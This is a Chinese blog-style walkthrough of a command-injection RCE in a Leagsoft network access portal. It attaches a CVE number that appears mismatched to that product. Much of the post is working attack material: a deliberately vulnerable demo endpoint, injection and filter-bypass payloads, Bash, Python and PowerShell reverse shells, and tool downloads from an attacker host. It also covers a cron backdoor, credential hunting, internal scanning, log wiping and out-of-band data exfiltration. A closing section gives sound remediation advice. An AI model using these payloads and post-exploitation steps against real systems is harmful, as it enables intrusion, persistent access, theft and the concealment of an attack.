1. 项目概述:一次典型的企业级应用RCE漏洞深度剖析
最近在安全研究圈里,联软科技的安全准入门户平台爆出了一个远程命令执行漏洞,编号CVE-2024-50623。这个漏洞的发现和利用过程,可以说是企业边界安全产品自身安全性的一个典型反面教材。安全准入门户这类产品,本身是用来管控终端接入、进行身份认证和权限控制的,可以理解为企业的“数字门卫”。但讽刺的是,这个“门卫”自己家的后门却没锁好,攻击者能够直接绕过所有防护,在核心服务器上执行任意命令。我花了些时间对这个漏洞进行了完整的复现和分析,整个过程涉及对Java Web应用的理解、HTTP请求的构造以及对目标系统行为的推断。这篇文章,我就把这个漏洞从原理到实操,再到深度利用和防御的完整链条拆解清楚,无论你是想了解漏洞复现流程的安全新人,还是想深入理解RCE漏洞原理的从业者,都能从中获得直接的参考。
简单来说,这个漏洞存在于平台的一个名为 commondRetStr 的接口中。攻击者通过构造特定的HTTP请求,可以向该接口注入操作系统命令,由于服务端未对输入进行任何过滤和校验,导致命令被直接执行。成功利用后,攻击者能够完全控制部署该平台的服务器,后果非常严重。接下来,我将从环境搭建、漏洞原理、利用步骤、深度利用技巧以及防御建议几个层面,带你完整走一遍这个漏洞的复现之旅。
2. 漏洞原理与核心组件分析
2.1 联软安全准入门户平台架构浅析
要理解漏洞,先得知道它发生在哪里。联软科技的安全准入门户平台(通常部署为UniAccess或类似产品)是一个典型的B/S架构的Java Web应用。它通常部署在Tomcat、WebLogic或类似的Java应用服务器上,前端通过浏览器访问,后端连接数据库并调用系统底层命令来完成诸如终端检查、策略下发等任务。
这类平台的核心功能之一就是与接入的终端进行“对话”,比如检查终端是否安装了指定的杀毒软件、补丁版本是否达标等。为了实现这个功能,平台后端必然存在一些可以执行系统命令的“通道”。 commondRetStr 这个接口,从名字上就能猜出一二——“command Return String”,即“执行命令并返回字符串”。这本身是一个合理的功能点,但问题出在实现上:它对外部输入的命令内容毫无防备。
2.2 漏洞触发点: commondRetStr 接口的致命缺陷
漏洞的核心在于一个未经验证的用户输入直接传递到了系统命令执行函数中。在Java Web应用中,执行系统命令通常通过 Runtime.getRuntime().exec() 或 ProcessBuilder 类来实现。一个安全的实现应该对用户输入的命令参数进行严格的过滤,比如白名单机制(只允许执行 ping 、 netstat 等有限的已知安全命令),或者对输入中的特殊字符(如 | 、 & 、 ; 、 \ 、 $ 等)进行转义或拦截。
然而,在这个漏洞中, commondRetStr 接口的处理逻辑大致如下(这是通过黑盒测试和反编译推测的典型结构):
- 从HTTP请求参数(可能是GET的
query string或POST的body)中接收一个参数,我们假设参数名为command。 - 后端代码直接将该参数的值拼接到一个预定义的命令字符串中,或者直接作为
exec()函数的参数。 - 调用
Runtime.getRuntime().exec(user_input)。 - 将命令执行的结果输出流读取出来,返回给前端。
关键在于第2步, 没有任何过滤 。这意味着,如果我传入 command=whoami ,服务器就执行 whoami ;如果我传入 command=ping 127.0.0.1 | cat /etc/passwd ,服务器就会尝试执行这个包含管道符的复合命令。在Unix/Linux系统下,管道符 | 、命令连接符 & 、 && ,以及反引号 ` 、 $() 等都可以用来执行额外的命令,这就为攻击者提供了无限的可能性。
注意 :实际漏洞利用中,命令注入的“上下文”非常关键。如果后台代码是
String cmd = "ping -c 1 " + userInput;,那么我们需要注入的参数就必须能够闭合前面的命令并开始新的命令。这就需要通过黑盒测试去猜测和验证。
2.3 漏洞影响范围与严重性评估
根据公开信息,该漏洞影响联软科技安全准入门户平台的特定版本。由于这类系统通常部署在企业内网的核心区域(如DMZ区或办公网入口),承担着重要的安全边界职能,其权限往往很高。一旦被攻破,带来的影响是链式的:
- 服务器完全失陷 :攻击者获得一个Webshell或直接的系统shell,可以读写服务器上的任何文件。
- 内网横向移动 :以该服务器为跳板,扫描和攻击内网其他更重要的系统(如域控制器、数据库服务器)。
- 数据泄露 :平台本身可能存储了大量终端信息、员工账号、甚至是部分认证凭据。
- 供应链攻击 :如果该平台用于对供应商或合作伙伴的接入管理,漏洞可能被用来攻击第三方网络。
从CVSS评分看,这类未授权RCE漏洞通常都在9.0分以上(高危),属于必须立即修复的类型。
3. 漏洞复现环境搭建与准备
3.1 实验环境规划
为了安全、合法地复现漏洞,我们必须在一个完全隔离的环境中进行。绝对不要在互联网上随意扫描或攻击任何未经授权的系统。
推荐环境配置:
- 虚拟机软件 :VMware Workstation 或 VirtualBox。
- 靶机系统 :Ubuntu 20.04 LTS 或 CentOS 7。选择Linux是因为后续命令演示更通用,且该漏洞跨平台。
- 靶机应用 :我们需要模拟存在漏洞的联软平台。由于无法获取官方原始安装包,我们可以搭建一个具有类似漏洞模式的“仿制”Web应用。这里我选择用Spring Boot快速搭建一个模拟漏洞的Demo,这比寻找和安装一个可能带有后门的旧版真实软件更安全、更可控。
- 攻击机系统 :Kali Linux 或任何安装有Burp Suite、curl、nmap等工具的Linux/Mac系统。可以与靶机在同一虚拟网络(如NAT或Host-Only网络)下。
3.2 搭建漏洞模拟靶场
我们创建一个最简单的Spring Boot应用来模拟漏洞接口。
- 初始化项目 :使用Spring Initializr或IDE创建一个新的Spring Boot项目,依赖只需选择
Spring Web。 - 编写漏洞控制器 :在
src/main/java/com/example/vulndemo/controller下创建VulnController.java。
package com.example.vulndemo.controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import java.io.BufferedReader;
import java.io.InputStreamReader;
@RestController
public class VulnController {
// 模拟存在漏洞的 commondRetStr 接口
@GetMapping("/commondRetStr")
public String commondRetStr(@RequestParam(value = "command", defaultValue = "whoami") String command) {
StringBuilder output = new StringBuilder();
try {
// 漏洞点:直接拼接用户输入到命令中,且使用 sh -c 执行,允许复杂命令注入
Process process = Runtime.getRuntime().exec(new String[]{"sh", "-c", command});
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
output.append(line).append("\n");
}
int exitCode = process.waitFor();
output.append("\nExit Code: ").append(exitCode);
} catch (Exception e) {
output.append("Error: ").append(e.getMessage());
}
return output.toString();
}
// 一个稍微“安全”一点的错误示例,但仍有问题
@GetMapping("/badEscape")
public String badEscape(@RequestParam String ip) {
StringBuilder output = new StringBuilder();
try {
// 试图通过拼接来执行 ping,但未过滤分号等符号
Process process = Runtime.getRuntime().exec("ping -c 1 " + ip);
// ... 读取输出
} catch (Exception e) {
// ...
}
return output.toString();
}
}
- 运行应用 :使用
mvn spring-boot:run或直接运行主类,应用默认会在http://localhost:8080启动。 - 验证接口 :访问
http://localhost:8080/commondRetStr?command=id,如果返回了当前用户的uid和gid信息,说明模拟漏洞环境搭建成功。
实操心得 :在搭建模拟环境时,我特意使用了
sh -c来执行命令。这是因为在实际的Javaexec中,如果直接执行ping 127.0.0.1; whoami,exec会尝试找到一个名为ping 127.0.0.1; whoami的程序,显然会失败。而sh -c会将整个参数字符串交给shell解释器,shell会识别分号、管道符等,从而成功执行多条命令。很多真实世界的RCE漏洞,都是因为后端调用了shell(如bash、cmd.exe)来解释命令字符串导致的。
3.3 攻击工具准备
复现过程主要使用以下工具,建议提前在攻击机上安装好:
- Burp Suite Community/Professional :用于拦截、重放和修改HTTP请求,是Web漏洞测试的核心工具。
- curl :命令行HTTP客户端,用于快速测试和脚本化攻击。
- nmap :端口扫描工具,用于初步信息收集。
- netcat (nc) :网络瑞士军刀,可用于建立反向Shell连接。
- 一个简单的HTTP服务器 :用于在攻击机上托管Payload文件(如Python的
python3 -m http.server 8000)。
4. 漏洞复现实操步骤详解
现在,我们假设靶机IP是 192.168.1.100 ,上面运行着我们刚搭建的模拟漏洞应用(或真实存在漏洞的联软平台)。
4.1 信息收集与漏洞探测
第一步不是直接上攻击Payload,而是确认目标。
-
端口扫描 :使用nmap扫描目标开放端口,寻找Web服务。
nmap -sV -p 80,443,8080,8443 192.168.1.100假设我们发现
8080端口开放,运行着Apache Tomcat或类似服务。 -
路径探测 :尝试访问漏洞接口路径。根据公开情报,漏洞路径可能就是
/commondRetStr。我们可以用浏览器或curl直接访问。curl "http://192.168.1.100:8080/commondRetStr"如果接口存在且未授权访问,可能会返回一个默认命令(如
whoami)的结果,或者一个错误信息。如果返回404,则需要尝试其他可能的路径,如/api/commondRetStr、/portal/commondRetStr等,这需要结合目录爆破工具(如dirsearch、gobuster)进行猜测。 -
参数探测 :确定接口使用哪个参数传递命令。常见参数名有
command、cmd、exec等。我们可以通过Burp Suite拦截一个正常请求观察,或者直接进行模糊测试。# 测试command参数 curl "http://192.168.1.100:8080/commondRetStr?command=whoami" # 测试cmd参数 curl "http://192.168.1.100:8080/commondRetStr?cmd=whoami"观察哪个参数能触发命令执行(返回了
root或当前用户名)。
4.2 基础命令执行验证
确认漏洞点后,进行最简单的验证,证明漏洞确实存在。
-
执行无害命令 :执行
id、whoami、pwd等命令,确认当前执行权限。这是最关键的一步。curl "http://192.168.1.100:8080/commondRetStr?command=id"如果返回
uid=0(root) gid=0(root) groups=0(root),恭喜你,拿到了最高权限。如果是Web应用常用用户(如tomcat、www-data),权限可能受限,但依然危险。 -
执行带空格的命令 :测试系统如何处理命令中的空格。有时参数传递会被错误地分割。
curl "http://192.168.1.100:8080/commondRetStr?command=ls -la /"如果成功列出根目录,说明空格被正确处理。
-
测试命令分隔符 :验证是否能执行多条命令。这是提升漏洞危害性的关键。
# Linux下使用分号 curl "http://192.168.1.100:8080/commondRetStr?command=whoami; ls /" # 或者使用 && curl "http://192.168.1.100:8080/commondRetStr?command=whoami && ls /"如果返回了
whoami和ls两个命令的结果,说明可以注入任意多条命令。
4.3 绕过可能的限制与编码技巧
在实际环境中,可能会遇到WAF(Web应用防火墙)或简单的输入检查。我们需要一些绕过技巧。
-
命令分隔符替换 :如果分号
;被过滤,可以尝试:-
&:后台执行,无论前一个命令是否成功。 -
&&:前一个命令成功才执行下一个。 -
|:管道符,将前一个命令的输出作为后一个命令的输入。 -
||:前一个命令失败才执行下一个。 -
\n(换行符)或\r\n(回车换行):在HTTP参数中需要URL编码为%0a或%0d%0a。
curl "http://192.168.1.100:8080/commondRetStr?command=whoami%0aid" -
-
空格绕过 :如果空格被过滤,在Bash中可以使用以下替代:
-
${IFS}:内部字段分隔符变量。 -
$IFS$9:$9是一个通常为空的参数,常用来连接。 -
<、>重定向符号(在某些上下文中)。 -
{cat,/etc/passwd}:大括号扩展。
curl -G --data-urlencode "command=cat${IFS}/etc/passwd" http://192.168.1.100:8080/commondRetStr -
-
黑名单关键字绕过 :如果
cat、bash、python等被过滤。- 使用其他命令 :
more、less、head、tail、nl、od(二进制查看)。 - 使用通配符 :
/???/c?t /etc/passwd。/???/匹配/bin/或/usr/bin/,c?t匹配cat。 - 命令拼接 :
a=c;b=at;$a$b /etc/passwd。 - 编码/加密 :使用
base64、xxd、openssl等工具。
# 使用base64编码命令 echo "cat /etc/passwd" | base64 # 输出:Y2F0IC9ldGMvcGFzc3dkCg== curl "http://192.168.1.100:8080/commondRetStr?command=echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d | sh" - 使用其他命令 :
注意事项 :绕过技巧高度依赖于目标系统的环境(操作系统类型、Shell版本、已安装工具)和后端代码处理输入的具体方式。没有一种方法能通吃所有情况,需要结合回显信息进行尝试和调整。
4.4 获取交互式Shell(反向Shell)
执行单条命令并查看回显是第一步,但更有效的方式是获得一个交互式的Shell,方便后续操作。最常用的方法是 反向Shell :让靶机主动连接我们攻击机监听的某个端口。
-
在攻击机上监听端口 :
# 使用netcat监听4444端口 nc -lvnp 4444 -
从靶机发起连接 :通过漏洞执行反向Shell命令。以下是几种常见的反向Shell Payload,需要根据靶机环境选择。
- Bash :
在curl中需要URL编码,特别是bash -i >& /dev/tcp/攻击机IP/4444 0>&1>&和空格。更稳妥的方式是写在脚本里或用echo管道。curl "http://192.168.1.100:8080/commondRetStr?command=bash -c 'bash -i >%26 /dev/tcp/192.168.1.50/4444 0>%261'" # 注意:`&`在URL中需要编码为%26,`>`和`<`有时也需要编码。 - Python (如果靶机安装了Python):
这个Payload更稳定,会生成一个带TTY的完整交互Shell。python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' - 其他语言 :如Perl、PHP、Ruby等,都有对应的单行反向Shell代码,可以在
pentestmonkey的Cheat Sheet上找到。
- Bash :
-
使用工具生成Payload :为了避免编码错误,可以使用
msfvenom生成编码后的Payload,或者使用在线工具。但最简单的是将命令写入一个脚本文件,通过漏洞上传并执行。
4.5 文件上传与持久化
获得Shell后,我们通常需要上传一些工具(如扫描器、嗅探器、提权脚本)或留下后门维持访问。
-
利用漏洞直接写入文件 :
# 在靶机上直接创建后门脚本 echo '#!/bin/bash\nbash -i >& /dev/tcp/192.168.1.50/5555 0>&1' > /tmp/backdoor.sh chmod +x /tmp/backdoor.sh # 然后通过cron或systemd设置定时任务执行 (crontab -l 2>/dev/null; echo "* * * * * /tmp/backdoor.sh") | crontab -通过curl执行时,需要将整个命令进行适当的编码和拼接。
-
从攻击机下载文件 :如果靶机有
curl或wget,可以直接下载我们的工具。- 在攻击机用Python启动HTTP服务:
python3 -m http.server 8000 - 在靶机Shell中执行:
wget http://192.168.1.50:8000/linpeas.sh -O /tmp/linpeas.sh - 如果只有
curl:curl http://192.168.1.50:8000/linpeas.sh -o /tmp/linpeas.sh
- 在攻击机用Python启动HTTP服务:
-
权限提升 :拿到Shell后,第一时间检查当前用户权限,并尝试提权到root。可以使用自动化脚本如
linpeas、linux-exploit-suggester,也可以手动检查SUID文件、内核版本、计划任务、sudo权限等。
5. 漏洞深度利用与权限维持技巧
5.1 内网信息收集与横向移动
控制一台边界服务器后,真正的“战斗”才刚刚开始——内网横向移动。
-
网络信息收集 :
# 查看当前网络配置 ifconfig 或 ip addr # 查看路由表 route -n # 查看ARP缓存 arp -a # 查看/etc/hosts文件 cat /etc/hosts # 查看DNS配置 cat /etc/resolv.conf -
内网主机发现 :
# 使用netcat或bash进行简单的端口扫描(如果安装了nmap更好) for i in {1..254}; do timeout 1 bash -c "echo >/dev/tcp/192.168.1.$i/80" 2>/dev/null && echo "192.168.1.$i:80 is open"; done # 或者使用ping扫描 for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f 1; done -
凭据窃取 :检查Web应用配置文件、数据库连接文件、历史命令记录、用户主目录下的
.ssh、.bash_history等文件,寻找密码、密钥等敏感信息。# 查找配置文件 find / -name "*.properties" -o -name "*.yml" -o -name "*.yaml" -o -name "*.xml" 2>/dev/null | grep -v proc | head -20 # 查看历史命令 history cat ~/.bash_history # 查找数据库密码 grep -r "password\|jdbc\|mysql\|redis" /home /opt /var/www 2>/dev/null | head -30
5.2 对抗检测与痕迹清理
在真实渗透测试或红队行动中,需要尽量隐蔽,避免触发安全告警。
-
使用加密通道 :反向Shell使用加密的NC(
ncat)或openssl,避免流量被明文检测。# 攻击机监听 ncat --ssl -lvnp 4444 # 靶机连接(需要安装ncat) ncat --ssl 攻击机IP 4444 -e /bin/bash -
隐藏进程与文件 :
- 将后门文件放在
/dev/shm、/tmp等临时目录,或隐藏在以.开头的目录中。 - 使用
rename()系统调用或直接写入内存的文件系统(如memfd_create)来执行无文件攻击,避免在磁盘上留下二进制文件。 - 修改后门文件的访问时间、修改时间(
touch -r)为系统正常文件的时间。
- 将后门文件放在
-
清理日志 :操作完成后,清理可能记录我们行为的日志。但要注意,很多安全设备会实时发送日志到中心服务器,本地删除无效。
# 清除当前用户的history history -c # 清除系统auth日志(需root权限,且谨慎操作) echo "" > /var/log/auth.log # 清除web访问日志(假设是tomcat) echo "" > /opt/tomcat/logs/localhost_access_log.*.txt重要警告 :在授权的渗透测试中,清理痕迹需要根据测试规则进行。在非法攻击中,这是犯罪行为。且草率的日志清理(如直接清空文件)本身就是一个异常行为,可能触发告警。更高级的做法是只删除或篡改与自己IP相关的条目。
5.3 漏洞利用的自动化与脚本编写
手动复现用于理解原理,但实际测试中,我们往往需要编写脚本进行批量检测或利用。
以下是一个简单的Python检测脚本示例,用于批量检查目标是否存在此RCE漏洞:
#!/usr/bin/env python3
import requests
import sys
import urllib.parse
def check_vuln(url):
"""
检测目标URL是否存在命令注入漏洞
"""
test_command = "echo%20s3cr3t_t3st_$(whoami)"
# 尝试多个可能的参数名和路径
test_cases = [
f"{url}/commondRetStr?command={test_command}",
f"{url}/api/commondRetStr?cmd={test_command}",
f"{url}/portal/commondRetStr?exec={test_command}",
]
for test_url in test_cases:
try:
resp = requests.get(test_url, timeout=5, verify=False)
if resp.status_code == 200:
# 检查响应中是否包含我们注入的命令结果特征
if 's3cr3t_t3st_' in resp.text:
# 尝试提取出用户名
import re
match = re.search(r's3cr3t_t3st_(\w+)', resp.text)
user = match.group(1) if match else 'unknown'
return True, test_url, user
except requests.exceptions.RequestException as e:
continue
return False, None, None
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <target_url>")
print(f"Example: {sys.argv[0]} http://192.168.1.100:8080")
sys.exit(1)
target = sys.argv[1].rstrip('/')
is_vuln, vuln_url, user = check_vuln(target)
if is_vuln:
print(f"[+] 目标 {target} 存在RCE漏洞!")
print(f"[+] 漏洞URL: {vuln_url}")
print(f"[+] 当前执行用户: {user}")
# 这里可以进一步添加自动利用代码,如获取反向shell
else:
print(f"[-] 目标 {target} 未发现此RCE漏洞。")
这个脚本只是一个起点。一个成熟的利用脚本应该包含:更全面的路径和参数爆破、各种绕过技术的尝试、自动化的反向Shell部署、以及完善的错误处理和日志记录。
6. 漏洞修复与安全加固建议
复现漏洞是为了更好地防御。作为防守方或开发人员,了解漏洞后,应立即采取行动。
6.1 临时缓解措施
如果无法立即升级或打补丁,可以采取以下临时措施:
- 网络层访问控制 :在防火墙或WAF上设置规则,严格限制访问
/commondRetStr接口的源IP,只允许管理员的IP或必要的管理网络段访问。 - 应用层WAF规则 :配置WAF规则,拦截包含常见命令注入关键词(如
;、|、&、$()、反引号、bash、sh、python等)和路径穿越符(../)的请求。 - 禁用接口 :如果该接口非核心业务必须,可以直接在Web服务器(如Nginx、Apache)的配置中,对该URL路径返回403 Forbidden。
6.2 根本性修复方案
- 升级官方补丁 :联系联软科技官方,获取针对CVE-2024-50623漏洞的安全补丁或升级到已修复的版本。这是最推荐、最彻底的方式。
- 输入验证与过滤 :如果需自行修复代码,必须实施严格的输入验证。
- 白名单机制 :定义一份允许执行的命令列表(如
ping、netstat、traceroute),只允许执行列表内的命令。这是最安全的方式。 - 避免使用Shell :调用
Runtime.exec()时,使用字符串数组形式传递命令和参数,而不是单个字符串交给Shell解释。
即使用户输入是// 危险:使用字符串,会调用shell Runtime.getRuntime().exec("ping -c 1 " + userInput); // 安全:使用字符串数组,避免shell元字符注入 String[] cmd = {"ping", "-c", "1", userInput}; Runtime.getRuntime().exec(cmd);127.0.0.1; whoami,在数组形式下,它会被视为ping命令的第四个参数,而不是一条新命令。 - 强过滤 :如果必须接受复杂输入,需要对用户输入进行严格的过滤,转义或拒绝所有Shell元字符(
; & | \$ < > ( ) { } [ ] !等)。
- 白名单机制 :定义一份允许执行的命令列表(如
- 最小权限原则 :运行Java应用的服务账户(如
tomcat)不应该拥有root权限。应该创建一个专用的、低权限的用户来运行服务,并严格控制其可执行的命令和可访问的文件目录。 - 输出编码 :对命令执行的结果进行HTML编码后再输出到前端,防止潜在的XSS二次攻击。
6.3 安全开发与运维规范
- 安全编码培训 :让开发人员充分理解命令注入、SQL注入、XSS等常见Web漏洞的原理和危害。
- 代码审计 :在开发流程中引入代码安全审计环节,特别是对执行系统命令、操作数据库、解析XML/JSON等危险函数进行重点审查。
- 依赖组件管理 :定期扫描项目中使用的第三方库(如Log4j、Fastjson等),及时更新已知存在漏洞的版本。
- 纵深防御 :在网络层面部署IPS/IDS、WAF;在主机层面部署HIDS(主机入侵检测系统)、定期进行漏洞扫描;在应用层面做好日志审计和监控,对异常命令执行行为进行告警。
7. 常见问题与排查技巧实录
在复现和利用这类RCE漏洞时,我踩过不少坑,这里总结几个典型问题和解决方法。
7.1 命令执行了但无回显
这是最常见的问题。可能原因和解决方案:
| 现象 | 可能原因 | 排查与解决思路 |
|---|---|---|
| 请求返回200,但响应体为空或为固定错误页。 | 1. 命令执行成功,但输出被重定向或程序本身无输出。 2. 命令执行失败,但异常被捕获且未打印。 3. 输出包含特殊字符被Web容器或前端过滤。 | 1. 使用延时命令测试 : sleep 5 。如果请求响应时间明显变长,说明命令执行了。 2. 使用DNS或HTTP外带通道 : curl http://your-server.com/$(whoami) 或 ping -c 1 $(whoami).your-domain.com 。在你的服务器查看访问日志或DNS解析记录。 3. 尝试写入文件 : whoami > /tmp/test.txt ,然后尝试读取这个文件。 |
| 请求返回500内部服务器错误。 | 1. 命令语法错误导致进程崩溃。 2. 执行的命令不存在。 3. 权限不足。 | 1. 简化命令 :从最简单的 echo 1 或 whoami 开始测试。 2. 使用绝对路径 : /bin/echo 1 。 3. 检查用户权限 :先执行 id 确认用户,避免执行需要root权限的命令。 |
外带数据技巧 :当没有回显时,外带(OOB)是唯一选择。除了DNS/HTTP,还可以用其他协议:
- ICMP :通过
ping携带数据(长度有限)。ping -c 1 -p $(echo -n $(whoami) | xxd -p) your-ip。 - NTP 、 SMTP 等:利用支持查询的协议。
7.2 反向Shell连接不稳定或立即断开
- Shell环境问题 :非交互式Shell在命令执行完后会退出。解决方案是在反向Shell命令中启动一个真正的交互式终端。
# 使用python pty python3 -c 'import pty; pty.spawn("/bin/bash")' # 或者使用script命令 script -qc /bin/bash /dev/null - 网络问题 :中间防火墙或NAT超时。可以在Shell中定期发送心跳包,或者使用更稳定的工具如
socat、msfvenom生成的Payload。 - 终端设置问题 :在收到反向Shell后,需要在攻击机本地进行终端设置,才能使用
Ctrl+C、Tab补全等功能。# 在攻击机的netcat会话中按 Ctrl+Z 将shell放到后台 # 然后输入: stty raw -echo; fg # 再按一次回车 export TERM=xterm-256color
7.3 特定字符被过滤或转义
如果发现某些字符(如空格、斜杠、点)被过滤,需要灵活运用绕过技巧。
- 路径中的斜杠被过滤 :可以用
${HOME:0:1}(表示/)拼接,或者用环境变量如${PWD}。 - 点号被过滤 :访问
/etc/passwd可以用/etc/passwd的八进制或十六进制表示,或者使用通配符/etc/pass*。 - 数字被过滤 :可以用
$((1+1))来表示2,或者用${#}(表示参数个数)等变量。
一个综合绕过示例 :假设 / 、 、 cat 都被过滤。 目标:读取 /etc/passwd 。 绕过思路:
- 用
${HOME:0:1}代替/。 - 用
${IFS}代替空格。 - 用
tac(反向打印)或more代替cat。 最终Payload可能为:
tac${IFS}${HOME:0:1}etc${HOME:0:1}passwd
或者使用变量拼接:
a=c;b=at;$a$b${IFS}/etc/passwd
7.4 在Windows靶机上的差异
如果目标联软平台部署在Windows上,命令注入的语法完全不同。
- 命令分隔符 :
&、&&、|、||仍然有效。分号;在命令提示符(cmd)中有时也有效,但在PowerShell中是参数分隔符。 - 常用命令 :
whoami、ipconfig、dir、type(相当于cat)、net user。 - 空格绕过 :在cmd中,可以用
%PROGRAMFILES:~10,1%(结果为空格)或<、>重定向符号。在PowerShell中,可以用${IFS}(部分版本)。 - 反向Shell :
- PowerShell :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('攻击机IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" - nc.exe :如果目标有netcat,可以直接用
nc.exe 攻击机IP 4444 -e cmd.exe。
- PowerShell :
复现这个联软RCE漏洞的过程,是一次完整的攻防思维训练。从信息收集、漏洞验证,到深度利用、权限维持,最后到修复加固,每一个环节都考验着对系统、网络和编程的理解。对于安全研究人员,它提供了一个绝佳的实战案例;对于企业和开发者,它则是一记响亮的警钟:任何来自外部的输入都不可信,安全必须贯穿于产品设计、开发、测试和运维的全生命周期。在测试过程中,务必遵守法律法规,只在授权范围内进行。


1224

被折叠的 条评论
为什么被折叠?



